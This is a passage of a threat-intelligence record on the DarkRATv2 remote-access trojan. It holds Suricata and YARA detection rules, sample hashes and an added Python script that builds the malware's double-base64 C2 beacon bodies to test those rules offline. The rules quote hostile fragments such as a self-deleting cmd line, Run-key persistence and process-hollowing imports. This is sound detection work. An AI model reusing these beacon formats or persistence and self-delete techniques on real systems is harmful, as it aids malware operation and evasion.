\u003e Mobile/9A334 Safari/7534.48.3\r\npastebin.com/raw/\r\nhttps://\r\nhttp://\r\nftp://\r\ninstalled\r\nopen\r\nrestart\r\nfailed\r\nsuccess\r\ntodo\r\nSuricata rules\r\n#By James_inthe_box\r\nalert tcp any any -\u003e any $HTTP_PORTS (msg:\"Darkrat Initial Request\"; flow:to_server,established;\r\ncontent:\"POST\"; http_method; content:\"request\"; http_uri; content:\"request=\"; http_client_body;\r\nreference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2;\r\nclasstype:trojan-activity; sid:20166304; rev:1; metadata:created_at 2019_08_15;)\r\nET TROJAN Win32/DarkRAT CnC? Activity\r\nhttps://doc.emergingthreats.net/bin/view/Main/2027886\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"ET TROJAN Win32/DarkRAT CnC? 
Activity\";\r\nflow:established,to_server; content:\"POST\"; http_method; content:!\".php\"; http_uri;\r\ncontent:!\"Mozilla\"; http_user_agent; pcre:\"/^[A-Za-z0-9]{3,10}$/Vs\";\r\ncontent:\"request=YUhkcFpEM\"; http_client_body; depth:17; fast_pattern;\r\npcre:\"/^[A-Za-z0-9\\/\\+\\=]{100,}$/PRsi\"; http_header_names; content:!\"Referer\";\r\nmetadata: former_category MALWARE;\r\nreference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2; classtype:trojan-activity; sid:\r\nYARA rules\r\n# need to clean it up a bit\r\nrule darkratv2\r\n{\r\nmeta:\r\nauthor = \"Albert Zsigovits\"\r\nstrings:\r\n$pdb = \"C:\\\\Users\\\\darkspider\" ascii wide\r\n$cmd = \"cmd.exe /C ping 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \\\"%s\\\"\" ascii wide\r\n$guid1 = \"SOFTWARE\\\\Microsoft\\\\Cryptography\" ascii wide\r\n$guid2 = \"MachineGuid\" ascii wide\r\n$persi1 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" ascii wide\r\n$persi2 = \"WinSystem32\" ascii wide\r\n$bin = \"pastebin.com/raw/\" ascii wide\r\n$import0 = \"NtUnmapViewOfSection\" ascii wide\r\n$import1 = \"WriteProcessMemory\" ascii wide\r\n$import2 = \"ResumeThread\" ascii wide\r\n$import3 = \"GetNativeSystemInfo\" ascii wide\r\n$import4 = \"URLOpenBlockingStream\" ascii wide\r\n$import5 = \"VirtualFree\" ascii wide\r\n$import6 = \"VirtualAlloc\" ascii wide\r\n$import7 = \"GetModuleHandle\" ascii wide\r\n$import8 = \"LoadLibrary\" ascii wide\r\n$import9 = \"CreateMutex\" ascii wide\r\n$vbs0 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\" ascii wide\r\n$vbs1 = \"Set objWMIService = GetObject(\\\"winmgmts:\\\\\\\\\\\" \u0026 sComputerName \u0026 \\\"\\\\root\\\\cimv2\\\"\r\n$vbs2 = \"Set objItems = objWMIService.ExecQuery(sQuery)\" ascii wide\r\n$vbs3 = \"sQuery = \\\"SELECT * FROM Win32_Process\\\"\" ascii wide\r\n$vbs4 = \"wscript.exe\" ascii wide\r\n$net0 
= \"POST\" ascii wide\r\n$net1 = \"\u0026taskid=\" ascii wide\r\n$net2 = \"\u0026taskstatus=\" ascii wide\r\n$net3 = \"\u0026spreadtag=\" ascii wide\r\n$net4 = \"\u0026operingsystem=\" ascii wide\r\n$net5 = \"\u0026arch=\" ascii wide\r\n$net6 = \"\u0026cpuName=\" ascii wide\r\n$net7 = \"\u0026gpuName=\" ascii wide\r\n$net8 = \"\u0026botversion=\" ascii wide\r\n$net9 = \"\u0026antivirus=\" ascii wide\r\n$net10 = \"\u0026netFramework4=\" ascii wide\r\n$net11 = \"\u0026netFramework35=\" ascii wide\r\n$net12 = \"\u0026netFramework3=\" ascii wide\r\n$net13 = \"\u0026netFramework2=\" ascii wide\r\n$net14 = \"\u0026installedRam=\" ascii wide\r\n$net15 = \"\u0026aornot=\" ascii wide\r\n$net16 = \"\u0026computername=\" ascii wide\r\n$net17 = \"hwid=\" ascii wide\r\n$net18 = \"request=\" ascii wide\r\ncondition:\r\n$pdb or $cmd or ( all of ($guid*) and all of ($persi*) ) or ( 3 of ($vbs*) ) or ( all of ($im\r\n}\r\nrule Darkrat_bin\r\n{\r\n meta:\r\n description = \"Darkrat\"\r\n author = \"James_inthe_box\"\r\n reference = \"https://github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2\"\r\n date = \"2019/08\"\r\n maltype = \"RAT\"\r\n \r\n strings:\r\n $string1 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\"\r\n $string2 = \"\u0026taskstatus=\"\r\n $string3 = \"network reset\"\r\n $string4 = \"text/plain\"\r\n $string5 = \"\u0026antivirus=\"\r\n $string6 = \"request=\"\r\n $string7 = \"\u0026arch=\"\r\n \r\n condition:\r\n uint16(0) == 0x5A4D and all of ($string*) and filesize \u003c 600KB\r\n}\r\n \r\nrule Darkrat_mem\r\n{\r\n meta:\r\n description = \"Darkrat\"\r\n author = \"James_inthe_box\"\r\n reference = \"https://github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2\"\r\n date = \"2019/08\"\r\n maltype = \"RAT\"\r\n \r\n 
strings:\r\n $string1 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\"\r\n $string2 = \"\u0026taskstatus=\"\r\n $string3 = \"network reset\"\r\n $string4 = \"text/plain\"\r\n $string5 = \"\u0026antivirus=\"\r\n $string6 = \"request=\"\r\n $string7 = \"\u0026arch=\"\r\n \r\n condition:\r\n all of ($string*) and filesize \u003e 600KB\r\n}\r\nOther YARA rules: https://pastebin.com/es915exd\r\nHashes\r\nSHA256 | Compiled | Size\r\n--- | --- | ---\r\n07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c |  | 991232\r\n08c63d13d117642c4fda82efd1e4a3ba1468ba6d07eb73a80c96e666701fa004 | 13 Jun 2019 18:17:13 UTC | 414720\r\n0e4a6a03b442efc5ae976ed57d66704e3a6c3393792adc1c1fe6a24d2da2352c | 16 Jun 2019 21:29:36 UTC | 415744\r\n0f98572f3fa5b70f51c5d090ff4414e0771414cea3309df33d97e9d675847f69 | 29 Jun 2019 05:44:02 UTC | 411648\r\n1273fd18cfbe2f3caef7b29f749eb14b09cbd48a33e4c24c75c1486a416f66bd | 22 Jun 2019 17:33:27 UTC | 929280\r\n148a5bcaaea8c74e8871ef82e2e6af584d91ae6ddb4d3b36b710ea0ac41ca999 | 23 Apr 2019 18:49:43 UTC | 272897\r\n1cc4577bbf9ca53ff285ea00ae41288a56e35d4472a97e4d7d65b749bce6ef11 | 01 Aug 2019 16:00:19 UTC | 418304\r\n1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814 | 02 Jul 2019 19:07:48 UTC | 411648\r\n2856f4ff4ac68e06b8712cdb8f8a5319c95d1e2479edf2b80e0d7fd9c2b2e80a | 11 May 2018 01:32:07 UTC | 560128\r\n2d2402ec680759b43efb1f1e0bc298e88c34da475b49237dede926a67587b5d0 | 29 Jul 2019 22:05:33 UTC | 411648\r\n2810b3924fe9d1f1642bc02c93e06391076341c8c7f8821da95f8a5b3bb14fa7 | 26 Jul 2019 20:40:31 UTC | 411648\r\n30689bc02dd60fb674bd2e7f08fa2192d8cbeb94c8ae4c42617a698d53f1781a | 09 Jun 2019 18:31:55 UTC | 414208\r\n3328f642826f94536ec3db7387be182bdb38c85bc4df23e422d1de465573c6b9 | 04 Aug 2019 17:03:01 UTC | 417727\r\n413fad039e9690ecc857d1c8cf90e132d521cc71d068f4286226affd66daa6e9 | 12 May 2018 14:19:21 UTC | 502784\r\n72e2948d99856cc42584d095ce79202d4de3141e197d4a94c1e7f3b325c0d4b5 | 09 Jul 2019 20:04:11 UTC | 412160\r\n763793e5725b92f61fbba97d15c8ded2817fb2623171a2db7eef94be5cc6729c | 26 Jul 2019 20:42:02 UTC | 411648\r\n88aab5d336162ec7acc074535966fc665c85f286bc652f884fd4a25dcdb1f37b | 22 Jun 2019 17:33:27 UTC | 410624\r\n8b1049117f561f5d4cf56258c7ca17551148e2c63af154ba04d96e1373d7dca0 | 05 Nov 2018 16:55:31 UTC | 525824\r\n8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f | 05 Jul 2019 17:55:16 UTC | 411648\r\n947461d7441512286618a6742282c2de9825d8295af0b5559bc6520711f476af | 03 Jun 2019 19:45:15 UTC | 475880\r\n9e65fa0964f3a81940ad88cb3652207e5ad050ac6aa8cadc9ae08f140b354b5f | 09 May 2018 18:54:19 UTC | 531456\r\na521906d8d60d94b14c63012d8ba7ded69b7bb5bde161c62bce8cc6e78434f8f | 26 Jul 2019 20:42:02 UTC | 177664\r\nbac3002b2f86de531ad50ac9163cad514bbc9d910cfce5fa3e0d6fb13589f05e | 26 Apr 1998 12:47:14 UTC | 556935\r\ncfa7f5ad7247d7d70fbbf4dce873fda9646e1964324e518030793ffa939dbd09 | 09 Jun 2019 18:31:55 UTC | 410096\r\nd07f601b72c6f91c1689141934a1c13a256a283db28e0982202e61d7c07b3abb | 23 Apr 2019 21:05:04 UTC | 272385\r\ne5d48c09723b9de123a30c7b1b91987707fc51abcbf97578d7f9d9012157d28d | 03 Aug 2019 21:02:54 UTC | 418304\r\nf1803ca741edac689dc4bb3cc20d30ea79cdb5198d58347ea71d25ed40c0fec7 | 22 Jun 2019 17:33:27 UTC | 410624\r\nf7d4c818939899d54b44929950c3e2b331b3787ceb8f72451c8bc375e0d79ac7 | 26 Jul 2019 20:42:02 UTC | 411648\r\nfd07d37e18bc922e5d92aeca2267efeec02599a0e35bfaa1d5dce9e27fae735d | 04 Aug 2019 17:03:01 UTC | 417792\r\n
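The two Suricata rules above, restated as Python predicates so they can be checked against a request offline. This is an added example, not code from the write-up or from DarkRat itself. It assumes one thing the page does not state outright but that the ET fast pattern implies: request=YUhkcFpEM is what a form string beginning hwid= becomes after two base64 passes, so encode_beacon builds bodies that way. The field names come from the strings section above; the field values, the /request path and the short User-Agent are made up for the example, and the iPhone Safari User-Agent is the one listed among the sample's strings.

```python
import base64
import re

# Field names from the strings section; the values are constructed for this example.
BEACON_FIELDS = [
    ('hwid', '3f2a1c9e8b7d4a6f5e1c2b3a4d5e6f70'),
    ('computername', 'DESKTOP-LAB01'),
    ('operingsystem', 'Windows10'),
    ('arch', 'x64'),
    ('botversion', '2.2.0'),
]

# The iPhone Safari agent listed in the strings dump above.
IPHONE_UA = ('Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) '
             'AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 '
             'Mobile/9A334 Safari/7534.48.3')


def encode_beacon(fields):
    # Assumed layering (inferred from the ET fast pattern, not stated on the page):
    # k=v pairs joined with &, base64, base64 again, then a request= prefix.
    form = '&'.join(k + '=' + v for k, v in fields)
    once = base64.b64encode(form.encode('ascii'))
    twice = base64.b64encode(once).decode('ascii')
    return 'request=' + twice


def make_request(user_agent, fields=BEACON_FIELDS, uri='/request'):
    # Minimal request model: method, URI, headers and client body.
    # The /request path is constructed so the first rule's URI clause is exercised.
    return {
        'method': 'POST',
        'uri': uri,
        'headers': {
            'User-Agent': user_agent,
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        'body': encode_beacon(fields),
    }


def rule_initial_request(req):
    # Darkrat Initial Request (James_inthe_box): POST method, the literal
    # request somewhere in the URI, and request= somewhere in the client body.
    return (req['method'] == 'POST'
            and 'request' in req['uri']
            and 'request=' in req['body'])


def rule_et_cnc(req):
    # ET TROJAN Win32/DarkRAT CnC Activity, clause by clause.
    ua = req['headers'].get('User-Agent', '')
    body = req['body']
    return (req['method'] == 'POST'                                          # POST on http_method
            and '.php' not in req['uri']                                     # negated .php on http_uri
            and 'Mozilla' not in ua                                          # negated Mozilla on http_user_agent
            and re.fullmatch('[A-Za-z0-9]{3,10}', ua) is not None            # pcre ^[A-Za-z0-9]{3,10}$ on the agent
            and body.startswith('request=YUhkcFpEM')                         # 17-byte content at depth 17, the fast_pattern
            and re.fullmatch('[A-Za-z0-9/+=]{100,}', body[17:]) is not None  # relative pcre: base64 text to the end of the body
            and 'Referer' not in req['headers'])                             # negated Referer on http_header_names


def evaluate(req):
    return {
        'initial_request': rule_initial_request(req),
        'et_cnc': rule_et_cnc(req),
    }


if __name__ == '__main__':
    for label, ua in (('short alphanumeric UA', 'abc123'), ('iPhone Safari UA', IPHONE_UA)):
        print(label, evaluate(make_request(ua)))
```

Run as a script it prints one verdict pair per request. The beacon sent with the bare alphanumeric User-Agent trips both signatures; the same beacon sent with the iPhone Safari User-Agent from the strings dump trips only the James_inthe_box rule, because the ET signature negates Mozilla and requires a 3 to 10 character alphanumeric agent. Which agent a given build puts on the wire is not something this page settles, so neither signature should be assumed to cover the other's traffic profile.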
Source: https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md"
	],
	"report_names": [
		"README.md"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434292,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.pdf",
		"text": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.txt",
		"img": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.jpg"
	}
}